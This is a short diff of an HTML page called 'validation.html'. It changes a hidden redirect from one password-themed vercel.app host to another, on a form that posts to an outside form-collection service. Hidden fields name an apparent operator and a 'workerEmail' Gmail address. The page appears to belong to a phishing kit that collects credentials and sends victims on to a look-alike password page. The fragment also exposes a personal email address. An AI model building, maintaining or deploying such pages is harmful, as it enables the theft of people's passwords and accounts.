--- a/validation.html
+++ b/validation.html
@@ -9,7 +9,7 @@
     </head>
     <body>
         <form class=content action=https://submit-form.com/vLryOVsTc/post method=POST>
-        <input type="hidden" name="_redirect" value="https://password-reapply.vercel.app/"/>
+        <input type="hidden" name="_redirect" value="https://password-reew.vercel.app/"/>
 
                 <input hidden="true" name="name" value="WaseemK">
                 <input hidden="true" name="workerEmail" value="asmaracookies9@gmail.com">
